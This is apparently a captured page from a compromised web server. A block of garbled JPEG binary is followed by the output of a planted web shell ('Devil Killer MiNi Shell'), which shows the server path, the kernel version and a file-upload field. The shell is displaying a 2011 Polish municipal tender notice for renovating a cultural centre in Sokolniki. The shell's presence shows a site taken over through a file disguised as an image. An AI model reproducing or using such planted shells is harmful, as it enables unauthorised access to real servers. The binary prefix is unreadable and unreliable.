JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110321/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110321/49418-N-2011.html

<p class="kh_header"><b>Sokolniki: Termomodernizacja budynku Gminnego Ośrodka Kultury, Sportu i Turystyki przy ul.Parkowej 1, w Sokolnikach.</b><br>
<b>Numer ogłoszenia: 49418 - 2011; data zamieszczenia: 21.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Sokolnikach , ul. Marsz. Józefa Piłsudskiego 1, 98-420 Sokolniki, woj. łódzkie, tel. 062 7845176, faks 062 7845194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sokolniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Gminnego Ośrodka Kultury, Sportu i Turystyki przy ul.Parkowej 1, w Sokolnikach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający nie dopuszcza możliwości składania ofert częściowych.
Opis przedmiotu zamówienia : 
Zakres prac obejmuje : 
1) łacenie połaci dachowych nad budynkiem głównym, pokrycie dachu nad budynkiem
głównym blachą dachówko podobną, obróbki blacharskie, obróbki z tworzyw sztucznych rynny i rury spustowe oraz wywiewki kanalizacyjne,
2) prace rozbiórkowe na trasie nad kuchnią, warstwy wyrównawcze z zaprawy cementowej pod posadzki, pokrycie papą termozgrzewalną - dwuwarstwowe, izolacje przeciwdźwiękowe poziome, obróbki blacharskie, tynki zewnętrzne, izolacje przeciwwilgociowe, balustrady schodowe,
3)ocieplenie ścian budynków płytami styropianowymi metodą lekką - mokrą, wyprawa 
elewacyjna cienkowarstwowa, osadzenie podokienników prefabrykowanych, elewacja z paneli układanych poziomo, montaż podsufitki,
4) izolacja pozioma, przeciwdźwiękowa na balkonie i daszku z płyt styropianowych,
posadzki cementowe, izolacja przeciwwilgociowa, obróbka blacharska, pokrycie papą
termozgrzewalna dwuwarstwowe,5) wykucie z muru ościeżnic, bramy rolowane izolowane, rolety zewnętrzne z napędem elektrycznym, kraty, drzwi zewnętrzne AL,
6) instalacja odgromowa : uziomy poziome w wykopie, przewody instalacji odgromowej poziome i pionowe, złącza kontrolne, badania i pomiary.2.1.Zakres zamówienia publicznego obejmuje : a) organizację terenu budowy,
- Zamawiający zaleca, aby Wykonawca, który będzie wykonywał przedmiot zamówienia dokonał ogrodzenia placu budowy, w celu uniemożliwienia dostępu osobom trzecim, podyktowane jest to względami bezpieczeństwa, ponieważ obok obiektu znajduje się plac zabaw dla dzieci oraz ogólnodostępny park,
b) dostawę materiałów, sprzętu i narzędzi niezbędnych do wykonania robót budowlanych, c) wykonanie robót budowlanych według dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót załączonych do SIWZ,
d) przeprowadzenie pozytywnych odbiorów badania skuteczności przewodów kominowych i wentylacyjnych oraz badania instalacji odgromowej przez odpowiednie instytucje określone polskim ustawodawstwem i pokrycie wszelkich kosztów z tym związanych, e) opracowanie dwóch egzemplarzy pełnej, kompletnej dokumentacji odbioru końcowego robót oraz zapewnienie wszelkich czynności prowadzących do uzyskania przez Zamawiającego pozwolenia na użytkowanie obiektu w sposób wymagany przepisami  prawa budowlanego (w przypadku odstępstw od zatwierdzonych projektów przeprowadzone stosownej procedury określonej polskim prawem).2.2. Zamawiający informuje, że wszelkie wymienionym w dokumentacji projektowej oraz specyfikacji technicznego wykonania i odbioru robót budowlanych, wskazaniom firm, urządzeń, systemów i innych znaków towarowych towarzysza wyrazy (lub równoważne).Wykonawca powinien zastosować materiały równorzędne, o parametrach nie gorszych niż wymienione.2.3. Przed przystąpienie do sporządzenia oferty Wykonawca zobowiązany jest do dokonania wizji lokalnej w terenie, podczas  której zbierze informacje o nieruchomości niezbędne do właściwej kalkulacji wynagrodzenia za wykonanie przedmiotu zamówienia oraz właściwego zaplanowania i organizacji wykonania przedmiotu zamówienia.2.4. Miejsce realizacji zamówienia - nieruchomość położona jest w Sokolnikach przy ul. Parkowej 1, 2.5. Użytkowaniem obiektu jest : Gminny Ośrodek Kultury, Sportu i Turystyki, ul. Marszałka Józefa Piłsudskiego 1, 98 - 420 Sokolniki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza w okresie 3 lat od podpisania umowy, udzielenie następnych zamówień uzupełniających, o których mowa w art.67 ust.1 pkt.6 ustawy Prawo zamówień publicznych, podlegających na wykonaniu robót budowlanych, które mogą okazać się konieczne z powodu ewentualnych korekt projektu na etapie wykonawstwa do wysokości 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.26.00.00-7, 45.42.11.00-5, 45.43.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości : 11.485,50 zł , słownie : jedenaście tysięcy czterysta osiemdziesiąt pięć złotych 50/100.  
2.Wadium może być wnoszone w jednej lub kilku następujących formach : 
    1) pieniądzu,
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
    3) gwarancjach bankowych,
    4) gwarancjach ubezpieczeniowych,
    5) poręczeniach udzielonych przed podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r, o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r, Nr 42 poz.275, ze zmianami).
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek  bankowy Rejonowego Banku Spółdzielczego w Lututowie, oddział w Sokolnikach,
nr konta : 79 9256 0004 4200 0127 2000 0010 z adnotacją : wadium przetargowe na termomodernizację budynku Gminnego Ośrodka Kultury,Sportu i Turystyki przy 
ul.  Parkowej 1 w Sokolnikach.
4.Wadium wniesione w pieniądzu Zamawiający przechowuje się na rachunku bankowym.
5.Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego. 
6.Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
7.Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie. 
8.Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 
9.Oferta niezabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie wykluczona bez rozpatrywania.




10.Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego
     oferta zostanie wybrana jako najkorzystniejsza.
11.Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci 
     wadium niezwłocznie po zawarciu umowy.
12.Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed 
     upływem terminu składania ofert.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została 
     wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
     określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się
      niemożliwe z przyczyn leżących po stronie Wykonawcy.
14.W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte 
      w art.45 i art.46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli   
przepisy prawa nakładają obowiązek ich posiadania : Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień ;
2) posiadania wiedzy i doświadczenia : 
W celu potwierdzenia wiedzy i doświadczenia Wykonawcy winni udokumentować
zrealizowanie przynajmniej trzech robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Opis wymaganego doświadczenia dla Wykonawców : 
a) wykaz co najmniej 3 robót budowlanych, o wartości każdej roboty nie mniejszej  
   niż 380.000,00 zł (brutto), wykonanych w okresie pięciu lat przed dniem wszczęcia 
   postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia 
   działalności jest krótszy - w tym okresie, odpowiadającym swoim rodzajem i 
   wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem 
   ich wartości oraz daty i miejsca wykonywania oraz załączeniem dokumentów  
   potwierdzających, że roboty te zostały wykonane należycie.
   b) potwierdzeniem wykazu wykonanych robót budowlanych mogą być :        
                  - referencje, 
                  - protokoły odbioru,
                  - lub inne, z których wynikałaby rzetelność wykonanych robót.
Przez roboty odpowiadające swoim rodzajem i wartością rozumie się - roboty tożsame
z przedmiotem niniejszego zamówienia publicznego na roboty budowlane.
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
   do wykonania zamówienia,
   a) należy dołączyć dokumenty stwierdzające, że osoba/osoby, które będą 
       uczestniczyć w wykonaniu zamówienia, posiadają wymagane ustawa z dnia 
       7 lipca 1994 r - Prawo budowlane (t. j. Dz.U. z 2006 r, Nr 156 poz.1118, ze 
       zmianami) uprawnienia to jest : 
                   - uprawnienia budowlane do kierowania robotami budowlanymi,
                   - zaświadczenie wydane przez izbę samorządu zawodowego 
                     potwierdzające aktualny wpis kierownika robót na listę członków tej 
                     izby. 
            4) sytuacji ekonomicznej i finansowej :
                a) w celu potwierdzenia spełnienia warunku znajdowania się przez  
                    Wykonawcę  w sytuacji ekonomicznej i finansowej zapewniającej 
                    wykonanie zamówienia należy złożyć następujące dokumenty : 
                    - polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
- informację banku, w którym Wykonawca posiada podstawowych rachunek bankowy,
  potwierdzającą wysokość posiadanych środków finansowych lub zdolność 
  kredytową,wystawioną nie wcześniej niż 6 miesięcy przed upływem ofert.
2. Wykonawca może polegać  na wiedzy i doświadczeniu, potencjale technicznym, 
   osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych 
   podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając, w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą  wykluczeniu z udziału w postępowaniu.
4. Z udziału w niniejszym postępowaniu wyklucza się Wykonawców, którzy podlegają  wykluczeniu na podstawie art.24 ust.1 i 2 Prawa zamówień publicznych.
5. Ofertę Wykonawcy wykluczonego uważa się za odrzuconą.
6. Zamawiający odrzuca ofertę, jeżeli : 
           1) jest niezgodną z ustawą,
           2) jej treść nie odpowiada treści specyfikacji istotnych warunków  
zamówienia,  z zastrzeżeniem art.87 ust.2 pkt.3 Prawa zamówień publicznych,  
           3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczuwanej konkurencji, 
           4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
           5) została złożona przez Wykonawcę wykluczonego z udziałem w postępowaniu o udzielenie zamówienia,
           6) zawiera błędy w obliczeniu ceny,
           7) Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art.87 ust.2 pkt.3 Prawa zamówień publicznych, 
           8) jest nieważna na podstawie odrębnych przepisów.
        7.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku  granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wykaz co najmniej 3 robót budowlanych, o wartości każdej roboty nie mniejszej  
    niż 380.000,00 zł (brutto), wykonanych w okresie pięciu lat przed dniem 
    wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres 
    prowadzenia  działalności jest krótszy - w tym okresie, odpowiadającym swoim 
    rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, 
    z podaniem ich wartości oraz daty i miejsca wykonywania oraz załączeniem 
    dokumentów potwierdzających, że roboty te zostały wykonane należycie.
    b) potwierdzeniem wykazu wykonanych robót budowlanych mogą być :        
       - referencje, 
       - protokoły odbioru,
       - lub inne, z których wynikałaby rzetelność wykonanych robót.
Przez roboty odpowiadające swoim rodzajem i wartością rozumie się - roboty tożsame
z przedmiotem niniejszego zamówienia publicznego na roboty budowlane.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku  granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do oferty należy dołączyć wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia.Wykonawca winien wykazać, że posiada co najmniej następujące wyposażenie: rusztowania fasadowe,wiertarka, mieszadło ocynkowane, naczynia do wody i zaprawy, deska szlifierska,kielnia, packa zębata,agregat tynkarski, pace do formowania powierzchni tynku,narzędzia do przecinania płyt siatki profili  stalowych z blachy ocynkowanej, łaty, poziomice, oraz samochód ciężarowy o ładowności 10 t.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje co najmniej jedną osobą (bądź kilkoma osobami które łącznie 
spełniają poniższe warunki), posiadają uprawnienia budowlane do : 
a) kierowania robotami budowlanymi bez ograniczeń w specjalnościach : 
                - konstrukcyjno - budowlanej
                - instalacyjne w zakresie sieci, instalacji i urządzeń elektrycznych i
                  elektroenergetycznych,
b) osoba(y), o której(ych) mowa powyżej może/mogą wykonywać samodzielnie  
    funkcje techniczne w budownictwie i spełnia/ją łącznie wszystkie poniżej warunki :
                  - jest/są wpisana/e (w drodze decyzji), do centralnego rejestru osób 
                    posiadających uprawnienia budowlane i       
                  - jest/są wpisana/e na listę członków właściwej izby samorządu  
                    zawodowego. 
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku  granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawozdanie finansowe albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości  również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego,innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli prowadzenia działalności jest krótszy - za ten okres.
Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których
Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Należy wykazać, że w ostatnich 5 latach obrotowych osiągnęli przychów nie mniejszy niż 380.000,00 zł , a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres oraz, że posiadają środki finansowe lub zdolność kredytową do środków w kwocie nie mniejszej niż 190.000,00 zł.      

Opłacona polisa, a w przypadku jej braku inny dokumentu potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
      
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku  granicznego - spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

